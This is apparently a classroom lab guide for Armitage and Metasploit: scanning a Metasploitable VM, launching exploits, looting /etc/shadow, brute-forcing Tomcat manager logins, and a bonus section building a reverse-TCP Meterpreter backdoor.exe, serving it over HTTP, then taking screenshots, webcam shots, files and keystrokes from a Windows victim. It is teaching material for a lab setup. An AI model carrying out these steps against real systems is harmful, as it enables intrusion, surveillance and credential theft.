Armitage Introduction Lab

Prerequisites

This lab will help introduce you to Armitage for Metasploit. Before we begin, you will need the following virtual machines:

- Metasploitable Linux Virtual Machine
- BackTrack 5r1 Virtual Machine

Set both virtual machine network adapters to the NAT setting.

Setup

BackTrack Linux

1. Login as username root, password toor
2. Type dhclient to request an IP address
3. Type startx to launch X-Windows
4. Open a Terminal
5. Type: msfupdate to update Metasploit and Armitage to the latest versions

Metasploitable

1. Login as username msfadmin, password msfadmin
2. Type sudo dhclient to request an IP address

Take note of the IP address of the Metasploitable virtual machine. You will need it for the remainder of this lab.

Start Armitage

1. Open a terminal
2. Type: armitage and press Enter
3. A dialog will ask if you'd like to start Metasploit's RPC server. Press Yes.

Wait for Armitage to connect to Metasploit. You will see "Connection Refused" multiple times for up to two minutes. This is normal. If something else happens, press Cancel and then press Help to troubleshoot the issue.

Reconnaissance

These steps will show you how to perform reconnaissance against the Metasploitable host. Remember that some scan techniques are more thorough than others.

1. Go to Hosts -> MSF Scans
2. Type in the IP address of the Metasploitable VM and press Ok
3. Right-click the host that appears in Armitage and select Services
4. Wait 30 seconds and press Refresh

Do not close the Services tab; we're going to compare the existing results to the results from another (more thorough) scan in a moment.

5. Go to Hosts -> Clear Database
6. Go to Hosts -> Nmap -> Intense Scan, all TCP Ports
7. Type in the IP address of the Metasploitable VM and press Ok

An Nmap tab will open. Wait for a dialog that says "Scan complete" before proceeding.

8. Right-click the Metasploitable host and select Services

How do the results of the intense Nmap scan compare to the results of the Metasploit scan?
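A concrete way to answer the comparison question is to diff the two scans' open-port lists rather than eyeballing two Services tabs. The script below is an added example, not part of this lab and not code from Armitage, Metasploit or Nmap: it parses the XML that Nmap writes with -oX (Armitage's Nmap menu runs Nmap for you, but you can also run it from the BackTrack terminal with -oX to get this file) and reports which open ports appear in only one of two runs. The two XML documents embedded in it are constructed samples shaped like Nmap's output; the address 192.0.2.10 and the service names and versions are made up for the example and are not Metasploitable's actual service list.

```python
"""Compare the open ports/services found by two Nmap scans of the same host.

Added example (not part of the lab, Armitage or Nmap). Parses Nmap XML
(nmap -oX file.xml) with the standard library and diffs the open ports.
The XML below is constructed sample data, not a real scan result.
"""
import xml.etree.ElementTree as ET

# Constructed sample: a quick scan of the default port list, no version detection.
QUICK_SCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/><service name="https"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Constructed sample: an "intense, all TCP ports" style scan with version detection.
FULL_SCAN_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL"/></port>
      <port protocol="tcp" portid="5432"><state state="open"/><service name="postgresql" product="PostgreSQL"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return {(proto, port): description} for every port whose state is 'open'."""
    root = ET.fromstring(xml_text)
    found = {}
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue  # closed/filtered ports are not inventory
        svc = port.find("service")
        name = svc.get("name", "") if svc is not None else ""
        product = svc.get("product", "") if svc is not None else ""
        version = svc.get("version", "") if svc is not None else ""
        desc = " ".join(part for part in (name, product, version) if part)
        found[(port.get("protocol"), int(port.get("portid")))] = desc
    return found


def compare_scans(xml_a, xml_b):
    """Return (only_in_a, only_in_b, in_both) as sorted lists of (proto, port)."""
    a, b = open_ports(xml_a), open_ports(xml_b)
    only_a = sorted(set(a) - set(b))
    only_b = sorted(set(b) - set(a))
    both = sorted(set(a) & set(b))
    return only_a, only_b, both


if __name__ == "__main__":
    only_quick, only_full, both = compare_scans(QUICK_SCAN_XML, FULL_SCAN_XML)
    full = open_ports(FULL_SCAN_XML)
    print("Open in both scans:", [p for _, p in both])
    print("Open only in the quick scan:", [p for _, p in only_quick])
    print("Open only in the full scan (missed by the quick scan):")
    for proto, port in only_full:
        print(f"  {port}/{proto}  {full[(proto, port)]}")
```

The same diff is useful from the defender's side: running it against a previous baseline scan of your own host shows which services appeared since the last inventory, which is exactly the information a quick, default-port scan would have missed.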
Try to repeat this process for other scans to appreciate the differences in the information they each provide.

Web Application Exploitation

These steps will show you how to check which exploits a service is vulnerable to.

1. Go to Attacks -> Find Attacks
2. Right-click Metasploitable and navigate to: Attacks -> webapp -> Check Exploits
3. In the Check Exploits tab, press Control+F and search for "vulnerable" without the quotes.
4. Right-click Metasploitable and navigate to: Attacks -> webapp -> [an attack that Metasploitable is vulnerable to]
5. Press Launch
6. Right-click Metasploitable and navigate to: Shell 1 -> Interact
7. To close the session, right-click Metasploitable -> Shell 1 -> Disconnect

Service Exploitation

These steps will guide you through finding another exploitable service and obtaining another shell session.

1. Go to Attacks -> Find Attacks. If you did this for the Web Application Exploitation steps, you don't need to do it again. Doing it again doesn't hurt anything, though.
2. Right-click Metasploitable and navigate to the Attacks menu
3. Select an exploit, don't change any options, and click Launch. Repeat this step until you find one that works. Hint: there are two other exploits in the Attacks menu that will work without any modification.

Do not close the shells you receive from your service exploitation in this step.

Linux Shell Post Exploitation

To accomplish these steps, you must have root access to the Metasploitable system.

1. Right-click Metasploitable and go to Shell N -> Interact for each of your shell sessions
2. In each shell, type: whoami
3. Find the shell that has a root user. This is the shell that you will use for these instructions.
4. Right-click Metasploitable and go to the root shell session: Shell N -> Post Modules
5. Double-click the enum_linux module in the module browser.
6. Press Launch
7. Go to View -> Loot
8. Double-click an item to view it.

The enum_linux module automatically captures a lot of data about a Linux system.
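Among the items enum_linux saves to Loot are copies of the system's /etc/passwd and /etc/shadow, and one of the questions you will be asked about this data is how many accounts have both a password and a valid login shell. Counting that by hand is error-prone, so here is an added example (not part of the lab and not code from the enum_linux module) that performs the count over passwd/shadow text and explains why each account was or was not counted. It is the same check an administrator runs when auditing a host for unexpected interactive accounts. The file contents embedded below are constructed samples with fake hashes, not Metasploitable's real files, and the set of "valid shells" is an assumption for the sample; on a real host /etc/shells is the authoritative list.

```python
"""Count accounts that can log in: password set and a real login shell.

Added example (not part of the lab or of enum_linux). Works on the text of
/etc/passwd and /etc/shadow, such as the copies enum_linux saves to Loot.
The sample files below are constructed, with placeholder hashes.
"""

# Constructed sample of /etc/passwd (name:x:uid:gid:gecos:home:shell).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/sh
svc:x:1002:1002:Service:/var/lib/svc:/bin/false
carol:x:1003:1003:Carol:/home/carol:/bin/bash
"""

# Constructed sample of /etc/shadow (name:hash:lastchg:min:max:warn:inactive:expire:flag).
# Hash values are fake placeholders; '*' means no usable password, '!' means locked.
SAMPLE_SHADOW = """root:$6$FAKEHASHROOT:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
sshd:*:15000:0:99999:7:::
alice:$6$FAKEHASHALICE:15000:0:99999:7:::
bob:!:15000:0:99999:7:::
svc:$6$FAKEHASHSVC:15000:0:99999:7:::
carol:$1$FAKEHASHCAROL:15000:0:99999:7:::
"""

# Assumed set of interactive shells for this sample; read /etc/shells on a real host.
VALID_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}


def parse_colon_file(text):
    """Parse passwd/shadow-style text into {name: [fields...]}, skipping blank, comment and malformed lines."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        entries[fields[0]] = fields
    return entries


def password_is_set(hash_field):
    """True when the shadow hash field holds a real hash rather than a disable/lock marker."""
    if not hash_field:            # empty field: no password at all
        return False
    if hash_field[0] in "*!":     # '*', '!', '!!' or '!$6$...' (locked hash)
        return False
    return True


def audit_logins(passwd_text, shadow_text, valid_shells=VALID_SHELLS):
    """Return (login_capable_users, reasons); reasons maps every user to why it was counted or skipped."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    capable, reasons = [], {}
    for name, fields in passwd.items():
        shell = fields[6] if len(fields) > 6 else ""
        shadow_fields = shadow.get(name)
        hash_field = shadow_fields[1] if shadow_fields and len(shadow_fields) > 1 else ""
        if shell not in valid_shells:
            reasons[name] = f"skipped: shell {shell!r} is not a login shell"
        elif shadow_fields is None:
            reasons[name] = "skipped: no shadow entry"
        elif not password_is_set(hash_field):
            reasons[name] = "skipped: password locked or not set"
        else:
            reasons[name] = "counted: password set and login shell"
            capable.append(name)
    return capable, reasons


if __name__ == "__main__":
    users, why = audit_logins(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for name, reason in why.items():
        print(f"{name:8} {reason}")
    print(f"\n{len(users)} account(s) can log in with a password: {', '.join(users)}")
```

Note the two ways an account drops out of the count: a non-interactive shell such as /usr/sbin/nologin or /bin/false, and a shadow field that is locked ('!') or disabled ('*'). An account with a real hash but a nologin shell is still worth noticing during an audit, since it can often authenticate to services that do not consult the shell field.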
Here are a few questions to answer as you go through all of this data:

1. Which version of AppArmor is installed?
2. How many users with passwords and valid shells (e.g., /bin/bash or /bin/sh) are on the system?
3. Which command did msfadmin use previously to reset the logs on the system?

Tomcat Attack

These steps will walk you through attacking Apache Tomcat. You will learn how to brute force a service, search for a relevant attack, and conduct post-exploitation using the Java version of Meterpreter.

1. Search for the tomcat_mgr_login module in the module browser
2. Double-click tomcat_mgr_login
3. The default RPORT is 8080. Apache Tomcat is on Metasploitable, but it's not on this port. Change the RPORT value to the correct port. Hint: Right-click Metasploitable and select Services.
4. Press Launch
5. Press Ctrl+F in the tomcat_mgr_login tab and search for "success"

Great, you now have credentials you may use to access the Apache Tomcat service. Let's find out what you can do with these credentials...

6. Search for tomcat in the module browser.
7. Double-click the Tomcat-related exploit
8. Set USERNAME, PASSWORD, and RPORT to the values you discovered in steps 1-5.

If everything is correct, you will now have a Java Meterpreter session on the Metasploitable host. Right-click Metasploitable -> Meterpreter and play with the options to see what is available to you. Meterpreter has a lot more power than a simple shell session. Exploring Windows Meterpreter is the subject of the bonus lab.

Bonus Lab: Post Exploitation

1. Prerequisites

To complete this lab, you will need a Windows target. The steps in this lab will work for a Windows XP, Windows Vista, and Windows 7 target. Your attack host should be BackTrack Linux 5r1 with the latest version of Armitage and Metasploit.

2. Steps

Generate a Backdoor and Listener (BackTrack Linux)

Follow these steps to generate an executable version of Metasploit's super payload, Meterpreter.
These steps will have you save the executable in the default directory for serving files over HTTP. These steps will also have you set up a multi/handler to receive connections from Meterpreter.

1. Start Armitage
2. In the module browser navigate to: payloads -> windows -> meterpreter -> reverse_tcp
3. Change RPORT to 9898
4. Change Output to exe
5. Hold the Shift key and click Launch
6. Save the file to /var/www/backdoor.exe
7. Change Output to multi/handler
8. Click Launch

Start a Webserver (BackTrack Linux)

Follow these steps to start the Apache webserver. You will also need to learn the IP address of your BackTrack host.

1. Open a terminal
2. Type: service apache2 start
3. Use ifconfig to learn the IP address of your BackTrack Linux host.

Get in Through the Backdoor (Windows Victim)

Follow these steps to "exploit" your Windows host. Really, you're just downloading the Meterpreter executable and running it.

1. Open Internet Explorer
2. Navigate to http://[ip address of BackTrack Linux host]/backdoor.exe
3. Run the file

Post Exploitation (BackTrack Linux)

You should now see a red computer with lightning bolts around it in Armitage. This is your Windows target. These steps will take you through various post-exploitation actions with Armitage. After these steps, you will have an appreciation for how much Meterpreter can do.

I See You...

1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Screenshot
2. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Webcam Shot. This will only work if your Windows host has a webcam attached.

Remote Control

1. Right-click the compromised host and navigate to: Meterpreter 1 -> Interact -> Desktop (VNC). Armitage will open a dialog telling you the port and display number to connect a VNC client to. Take note of the port number. Here I will use 53. It will be something different for you.
2. Open a Terminal in BackTrack Linux
3. Type: vncviewer 127.0.0.1:53 (change 53 to the display number provided by Armitage)

Get the Data

1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> File Browser
2. In the file path text field (top of the browser), type C:\ and hit Enter.
3. Navigate to your desktop
4. Download a file
5. Go to: View -> Downloads
6. Double-click the file to view it

Capture Keystrokes

1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Log Keystrokes
2. Press Launch
3. From your Windows target: navigate to a website that you use, log out, and log in by typing your credentials.
4. Take a look at the output of the Log Keystrokes tab.